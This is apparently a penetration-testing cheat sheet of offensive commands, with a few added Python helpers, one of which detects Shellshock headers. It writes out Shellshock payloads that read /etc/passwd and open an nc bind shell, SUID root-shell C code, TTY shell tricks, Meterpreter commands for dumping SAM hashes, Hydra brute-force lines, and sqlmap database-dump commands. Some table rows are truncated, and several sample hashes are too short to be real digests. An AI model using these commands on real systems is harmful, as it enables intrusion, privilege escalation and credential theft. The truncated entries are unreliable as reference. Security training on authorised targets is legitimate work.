BOF / Exploit
Exploit Research
Find exploits for enumerated hosts / services.
COMMAND | DESCRIPTION |
---|---|
searchsploit windows 2003 \| grep -i local | Search exploit-db for exploit, in this example windows 2003 + local esc |
site:exploit-db.com exploit kernel <= 3 | Use google to search exploit-db.com for exploits |
grep -R "W7" /usr/share/metasploit-framework | Search metasploit modules using grep – msf search sucks a bit |

Searching for Exploits
Install local copy of exploit-db:
searchsploit -u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
Compiling Windows Exploits on Kali
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
Cross Compiling Exploits
gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)
Exploiting Common Vulnerabilities
Exploiting Shellshock
A tool to find and exploit servers vulnerable to Shellshock:
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock reverse Shell
nc -l -p 443
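A defender-side check for the probe above, added here as an example and not part of the original cheat sheet: it parses raw HTTP requests (the samples are constructed; the second reuses the User-Agent string shown above) and flags any header whose value starts with the `() {` function-definition prefix that unpatched bash picks up from the CGI environment.

```python
import re
from typing import List, Tuple

# Constructed sample requests. The second reuses the User-Agent probe shown above;
# the third carries the same prefix in another header that CGI also exports.
BENIGN_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    "Host: www.example.com\r\n\r\n"
)
PROBE_REQUEST = (
    "HEAD /cgi-bin/status HTTP/1.1\r\n"
    "User-Agent: () { :;}; echo $(</etc/passwd)\r\n"
    "Host: vulnerable\r\n"
    "Connection: close\r\n\r\n"
)
REFERER_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Referer: () { :; }; /bin/true\r\n"
    "Host: vulnerable\r\n\r\n"
)

# Unpatched bash imports any environment variable whose value begins with "() {" as a
# function definition and runs whatever follows the closing brace. CGI servers copy
# request headers into the environment (HTTP_USER_AGENT, HTTP_REFERER, ...), so a
# header value starting with that prefix is the signature; spaces are optional here.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a raw HTTP request into (name, value) header pairs, skipping the request line."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers


def find_shellshock_headers(raw: str) -> List[str]:
    """Return the names of headers in the request whose value carries the Shellshock prefix."""
    return [name for name, value in parse_headers(raw) if SHELLSHOCK_RE.match(value)]


if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("probe", PROBE_REQUEST), ("referer", REFERER_REQUEST)):
        print(f"{label}: flagged headers = {find_shellshock_headers(req)}")
```

The same check can be run over an access log or a proxy capture; anything it flags against a CGI path is worth a look regardless of whether the host is patched.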
Simple Local Web Servers
Python local web server command, handy for serving up shells and exploits on an attacking machine.
COMMAND | DESCRIPTION |
---|---|
python -m SimpleHTTPServer 80 | Run a basic http server, great for serving up shells etc |
python3 -m http.server | Run a basic Python3 http server, great for serving up shells etc |
ruby -rwebrick -e "WEBrick::HTTPServer.new | Run a ruby webrick basic http server |
php -S 0.0.0.0:80 | Run a basic PHP http server |

Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.
COMMAND | DESCRIPTION |
---|---|
mount 192.168.1.1:/vol/share /mnt/nfs | Mount NFS share to /mnt/nfs |
mount -t cifs -o username=user,password=pass | Mount Windows CIFS / SMB share on Linux at /mnt/cifs; if you remove password it will prompt on the CLI (more secure as it won't end up in bash_history) |
net use Z: \\win-server\share password | Mount a Windows share on Windows from the command line |
apt-get install smb4k -y | Install smb4k on Kali, useful Linux GUI for browsing SMB shares |

HTTP / HTTPS Webserver Enumeration
COMMAND | DESCRIPTION |
---|---|
nikto -h 192.168.1.1 | Perform a nikto scan against target |
dirbuster | Configure via GUI, CLI input doesn’t work most of the time |

Packet Inspection
COMMAND | DESCRIPTION |
---|---|
tcpdump tcp port 80 -w output.pcap -i eth0 | tcpdump for port 80 on interface eth0, outputs to output.pcap |

Username Enumeration
Some techniques used to remotely enumerate users on a target system.
SMB User Enumeration
COMMAND | DESCRIPTION |
---|---|
python /usr/share/doc/python-impacket-doc/examples | Enumerate users from SMB |
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt | RID cycle SMB / enumerate users from SMB |

SNMP User Enumeration
COMMAND | DESCRIPTION |
---|---|
snmpwalk public -v1 192.168.X.XXX 1 \| grep 77.1.2.25 | Enumerate users from SNMP |
python /usr/share/doc/python-impacket-doc/examples/ | Enumerate users from SNMP |
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt | Search for SNMP servers with nmap, grepable output |

Passwords
Wordlists
COMMAND | DESCRIPTION |
---|---|
/usr/share/wordlists | Kali word lists |

Brute Forcing Services
Hydra FTP Brute Force
COMMAND | DESCRIPTION |
---|---|
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f | Hydra FTP brute force |

Hydra POP3 Brute Force
COMMAND | DESCRIPTION |
---|---|
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f | Hydra POP3 brute force |

Hydra SMTP Brute Force
COMMAND | DESCRIPTION |
---|---|
hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V | Hydra SMTP brute force |

Use -t to limit concurrent connections, example: -t 15
Password Cracking
John The Ripper – JTR
COMMAND | DESCRIPTION |
---|---|
john --wordlist=/usr/share/wordlists/rockyou.txt hashes | JTR password cracking |
john --format=descrypt --wordlist | JTR forced descrypt cracking with wordlist |
john --format=descrypt hash --show | JTR forced descrypt brute force cracking |

Windows Penetration Testing Commands
See Windows Penetration Testing Commands.
Linux Penetration Testing Commands
See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.
Compiling Exploits
Some notes on compiling exploits.
Identifying if C code is for Windows or Linux
C #includes will indicate which OS should be used to build the exploit.
INCLUDES | DESCRIPTION |
---|---|
process.h, string.h, winbase.h, windows.h, winsock2.h | Windows exploit code |
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, | Linux exploit code |

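An added helper (not from the original cheat sheet) that applies the table above to a C source file: it pulls out the #include lines, matches them against the Windows and Linux header sets, and reports which platform to build for along with the matching build command from this page. string.h is standard C on both platforms, so it is treated as neutral here; unistd.h and sys/socket.h are POSIX headers added to the Linux set beyond the table. The sample sources are constructed.

```python
import re
from typing import Dict, List

# Header sets from the table above. string.h is standard C on every platform, so
# it is not counted for either side; unistd.h and sys/socket.h are POSIX-only
# headers not listed in the table (added here).
WINDOWS_HEADERS = {"process.h", "winbase.h", "windows.h", "winsock2.h"}
LINUX_HEADERS = {"arpa/inet.h", "fcntl.h", "netdb.h", "netinet/in.h", "sys/socket.h", "unistd.h"}

# Matches `#include <x.h>` and `#include "x.h"`, tolerating spaces after '#'.
INCLUDE_RE = re.compile(r'^\s*#\s*include\s*[<"]([^>"]+)[>"]', re.MULTILINE)

# Build commands from this page, keyed by the detected platform.
BUILD_COMMANDS = {
    "windows": "i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe",
    "linux": "gcc -o exploit exploit.c",
}


def classify_source(c_source: str) -> Dict[str, object]:
    """Decide from the #includes whether a C file targets Windows, Linux, both (mixed) or neither (unknown)."""
    includes = INCLUDE_RE.findall(c_source)
    # Windows headers are case-insensitive (<WinSock2.h> and <winsock2.h> are the same file).
    win = sorted({h for h in includes if h.replace("\\", "/").lower() in WINDOWS_HEADERS})
    nix = sorted({h for h in includes if h in LINUX_HEADERS})
    if win and nix:
        platform = "mixed"
    elif win:
        platform = "windows"
    elif nix:
        platform = "linux"
    else:
        platform = "unknown"
    return {"platform": platform, "windows": win, "linux": nix, "build": BUILD_COMMANDS.get(platform)}


# Constructed samples: the include blocks of a typical Windows and a typical Linux network exploit.
WINDOWS_SAMPLE = "#include <stdio.h>\n#include <string.h>\n#include <WinSock2.h>\n#include <windows.h>\n"
LINUX_SAMPLE = "#include <stdio.h>\n#include <string.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n"

if __name__ == "__main__":
    for name, src in (("windows", WINDOWS_SAMPLE), ("linux", LINUX_SAMPLE)):
        print(name, classify_source(src))
```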
Build Exploit GCC
Compile exploit gcc.
COMMAND | DESCRIPTION |
---|---|
gcc -o exploit exploit.c | Basic GCC compile |

GCC Compile 32Bit Exploit on 64Bit Kali
Handy for cross compiling 32 bit binaries on 64 bit attacking machines.
COMMAND | DESCRIPTION |
---|---|
gcc -m32 exploit.c -o exploit | Cross compile 32 bit binary on 64 bit Linux |

Compile Windows .exe on Linux
Build / compile windows exploits on Linux, resulting in a .exe file.
COMMAND | DESCRIPTION |
---|---|
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe | Compile windows .exe on Linux |

SUID Binary
SUID C binaries are often required to spawn a shell as a superuser; you can update the UID / GID and shell as required.
Below are some quick copy and paste examples for various shells:
SUID C Shell for /bin/bash
```c
#define _GNU_SOURCE   /* setresuid() is only declared by glibc with this macro */
#include <stdlib.h>
#include <unistd.h>
int main(void){
    setresuid(0, 0, 0);  /* real, effective and saved UID all set to root */
    system("/bin/bash");
}
```
SUID C Shell for /bin/sh
```c
#define _GNU_SOURCE   /* setresuid() is only declared by glibc with this macro */
#include <stdlib.h>
#include <unistd.h>
int main(void){
    setresuid(0, 0, 0);  /* real, effective and saved UID all set to root */
    system("/bin/sh");
}
```
Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
Reverse Shells
See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.
Python TTY Shell Trick
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
Spawn Interactive sh shell
/bin/sh -i
Spawn Perl TTY Shell
exec "/bin/sh";
perl -e 'exec "/bin/sh";'
Spawn Ruby TTY Shell
exec "/bin/sh"
Spawn Lua TTY Shell
os.execute('/bin/sh')
Spawn TTY Shell from Vi
Run shell commands from vi:
:!bash
Spawn TTY Shell NMAP
!sh
Metasploit
Some basic Metasploit stuff that I have found handy for reference.
Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.
Meterpreter Payloads
Windows reverse meterpreter payload
COMMAND | DESCRIPTION |
---|---|
set payload windows/meterpreter/reverse_tcp | Windows reverse tcp payload |

Windows VNC Meterpreter payload
COMMAND | DESCRIPTION |
---|---|
set payload windows/vncinject/reverse_tcp | Meterpreter Windows VNC Payload |

Linux Reverse Meterpreter payload
COMMAND | DESCRIPTION |
---|---|
set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |

Meterpreter Cheat Sheet
Useful meterpreter commands.
COMMAND | DESCRIPTION |
---|---|
upload file c:\\windows | Meterpreter upload file to Windows target |
download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target |
execute -f c:\\windows\\temp\\exploit.exe | Meterpreter run .exe on target – handy for executing uploaded exploits |
execute -f cmd -c | Creates new channel with cmd shell |
ps | Meterpreter show processes |
shell | Meterpreter get shell on the target |
getsystem | Meterpreter attempts privilege escalation on the target |
hashdump | Meterpreter attempts to dump the hashes on the target |
portfwd add -l 3389 -p 3389 -r target | Meterpreter create port forward to target machine |
portfwd delete -l 3389 -p 3389 -r target | Meterpreter delete port forward |

Common Metasploit Modules
Top metasploit modules.
Remote Windows Metasploit Modules (exploits)
COMMAND | DESCRIPTION |
---|---|
use exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
use exploit/windows/dcerpc/ms06_040_netapi | MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit |
use exploit/windows/smb/ | MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit |

Local Windows Metasploit Modules (exploits)
COMMAND | DESCRIPTION |
---|---|
use exploit/windows/local/bypassuac | Bypass UAC on Windows 7 + Set target + arch, x86/64 |

Auxiliary Metasploit Modules
COMMAND | DESCRIPTION |
---|---|
use auxiliary/scanner/http/dir_scanner | Metasploit HTTP directory scanner |
use auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS vulnerability scanner |
use auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner |
use auxiliary/scanner/mysql/mysql_version | Metasploit MySQL Version Scanner |
use auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module |

Metasploit Powershell Modules
COMMAND | DESCRIPTION |
---|---|
use exploit/multi/script/web_delivery | Metasploit powershell payload delivery module |
post/windows/manage/powershell/exec_powershell | Metasploit upload and run powershell script through a session |
use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy |
use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload |

Post Exploit Windows Metasploit Modules
Windows Metasploit Modules for privilege escalation.
COMMAND | DESCRIPTION |
---|---|
run post/windows/gather/win_privs | Metasploit show privileges of current user |
use post/windows/gather/credentials/gpp | Metasploit grab GPP saved passwords |
load mimikatz -> wdigest | Metasploit load Mimikatz |
run post/windows/gather/local_admin_search_enum | Identify other machines that the supplied domain user has administrative access to |
run post/windows/gather/smart_hashdump | Automated dumping of sam file, tries to esc privileges etc |

ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
ASCII | CHARACTER |
---|---|
x00 | Null Byte |
x08 | BS |
x09 | TAB |
x0a | LF |
x0d | CR |
x1b | ESC |
x20 | SPC |
x21 | ! |
x22 | " |
x23 | # |
x24 | $ |
x25 | % |
x26 | & |
x27 | ' |
x28 | ( |
x29 | ) |
x2a | * |
x2b | + |
x2c | , |
x2d | - |
x2e | . |
x2f | / |
x30 | 0 |
x31 | 1 |
x32 | 2 |
x33 | 3 |
x34 | 4 |
x35 | 5 |
x36 | 6 |
x37 | 7 |
x38 | 8 |
x39 | 9 |
x3a | : |
x3b | ; |
x3c | < |
x3d | = |
x3e | > |
x3f | ? |
x40 | @ |
x41 | A |
x42 | B |
x43 | C |
x44 | D |
x45 | E |
x46 | F |
x47 | G |
x48 | H |
x49 | I |
x4a | J |
x4b | K |
x4c | L |
x4d | M |
x4e | N |
x4f | O |
x50 | P |
x51 | Q |
x52 | R |
x53 | S |
x54 | T |
x55 | U |
x56 | V |
x57 | W |
x58 | X |
x59 | Y |
x5a | Z |
x5b | [ |
x5c | \ |
x5d | ] |
x5e | ^ |
x5f | _ |
x60 | ` |
x61 | a |
x62 | b |
x63 | c |
x64 | d |
x65 | e |
x66 | f |
x67 | g |
x68 | h |
x69 | i |
x6a | j |
x6b | k |
x6c | l |
x6d | m |
x6e | n |
x6f | o |
x70 | p |
x71 | q |
x72 | r |
x73 | s |
x74 | t |
x75 | u |
x76 | v |
x77 | w |
x78 | x |
x79 | y |
x7a | z |

CISCO IOS Commands
A collection of useful Cisco IOS commands.
COMMAND | DESCRIPTION |
---|---|
enable | Enters enable mode |
conf t | Short for configure terminal |
(config)# interface fa0/0 | Configure FastEthernet 0/0 |
(config-if)# ip addr 0.0.0.0 255.255.255.255 | Add ip to fa0/0 |
(config-if)# line vty 0 4 | Configure vty line |
(config-line)# login | Cisco set telnet password |
(config-line)# password YOUR-PASSWORD | Set telnet password |
\# show running-config | Show running config loaded in memory |
\# show startup-config | Show startup config |
\# show version | Show cisco IOS version |
\# show session | Display open sessions |
\# show ip interface | Show network interfaces |
\# show interface e0 | Show detailed interface info |
\# show ip route | Show routes |
\# show access-lists | Show access lists |
\# dir file systems | Show available files |
\# dir all-filesystems | File information |
\# dir /all | Show deleted files |
\# terminal length 0 | No limit on terminal output |
\# copy running-config tftp | Copies running config to tftp server |
\# copy running-config startup-config | Copy running-config to startup-config |

Cryptography
Hash Lengths
HASH | SIZE |
---|---|
MD5 Hash Length | 16 Bytes |
SHA-1 Hash Length | 20 Bytes |
SHA-256 Hash Length | 32 Bytes |
SHA-512 Hash Length | 64 Bytes |
Hash Examples
Likely just use hash-identifier for this but here are some example hashes:
HASH | EXAMPLE |
---|---|
MD5 Hash Example | 8743b52063cd84097a65d1633f5c74f5 |
MD5 $PASS:$SALT Example | 01dfae6e5d4d90d9892622325959afbe:7050461 |
MD5 $SALT:$PASS | f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 |
SHA1 Hash Example | b89eaac7e61417341b710b727768294d0e6a277b |
SHA1 $PASS:$SALT | 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 |
SHA1 $SALT:$PASS | cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 |
SHA-256 | 127e6fbfe24a750e72930c220a8e138275656b |
SHA-256 $PASS:$SALT | c73d08de890479518ed60cf670d17faa26a4a7 |
SHA-256 $SALT:$PASS | eb368a2dfd38b405f014118c7d9747fcc97f4 |
SHA-512 | 82a9dda829eb7f8ffe9fbe49e45d47d2dad9 |
SHA-512 $PASS:$SALT | e5c3ede3e49fb86592fb03f471c35ba13e8 |
SHA-512 $SALT:$PASS | 976b451818634a1e2acba682da3fd6ef |
NTLM Hash Example | b4b9b02e6f09a9bd760f388b67351e2b |
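An added example, not part of the original cheat sheet, that turns the two tables above into a quick classifier: it splits off a `:salt` suffix, converts the hex length to a digest size in bytes and looks the size up in the Hash Lengths table. Two caveats it makes visible: MD5 and NTLM are both 16 bytes, so a bare 32-character hex string cannot be told apart by length alone, and `hash:salt` strings look identical whether the salt was prepended or appended. The inputs are the table's own example values plus digests of a constructed sample.

```python
import hashlib
import re
from typing import Dict, List, Optional

# Digest size in bytes -> algorithms from the Hash Lengths table that produce it.
# NTLM (MD4 over the UTF-16LE password) is also 16 bytes, so it shares the MD5 row.
DIGEST_SIZES: Dict[int, List[str]] = {
    16: ["MD5", "NTLM"],
    20: ["SHA-1"],
    32: ["SHA-256"],
    64: ["SHA-512"],
}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def identify_hash(candidate: str) -> Dict[str, object]:
    """Classify a hash string, optionally in `hash:salt` form, by digest length.

    Returns the candidate algorithms, the salt if one was attached, and the
    digest size in bytes (None when the digest part is not even-length hex).
    $PASS:$SALT and $SALT:$PASS are both stored as `hash:salt`; the order only
    matters to the cracker, so it cannot be recovered by inspection.
    """
    digest, _, salt = candidate.strip().partition(":")
    if not HEX_RE.match(digest) or len(digest) % 2:
        return {"algorithms": [], "salt": salt or None, "bytes": None}
    size = len(digest) // 2
    return {"algorithms": DIGEST_SIZES.get(size, []), "salt": salt or None, "bytes": size}


def verify_table(sample: bytes = b"constructed sample") -> Dict[str, Optional[int]]:
    """Hash a constructed sample with each algorithm and report the size identify_hash sees."""
    algos = {"MD5": hashlib.md5, "SHA-1": hashlib.sha1, "SHA-256": hashlib.sha256, "SHA-512": hashlib.sha512}
    return {name: identify_hash(fn(sample).hexdigest())["bytes"] for name, fn in algos.items()}


if __name__ == "__main__":
    # Values from the Hash Examples table; the last is its SHA-256 entry, which is
    # shorter than a full 64-character digest and therefore comes back unclassified.
    for value in ("8743b52063cd84097a65d1633f5c74f5",
                  "2fc5a684737ce1bf7b3b239df432416e0dd07357:2014",
                  "b4b9b02e6f09a9bd760f388b67351e2b",
                  "127e6fbfe24a750e72930c220a8e138275656b"):
        print(value, "->", identify_hash(value))
    print(verify_table())
```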
SQLMap Examples
COMMAND | DESCRIPTION |
---|---|
sqlmap -u http://meh.com --forms --batch --crawl=10 | Automated sqlmap scan |
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE | Targeted sqlmap scan |
sqlmap -u "http://meh.com/meh.php?id=1" | Scan url for union + error based injection with mysql backend and use a random user agent + database dump |
sqlmap -o -u "http://meh.com/form/" --forms | sqlmap check form for injection |
sqlmap -o -u "http://meh/vuln-form" --forms | sqlmap dump and crack hashes for table users on database-name. |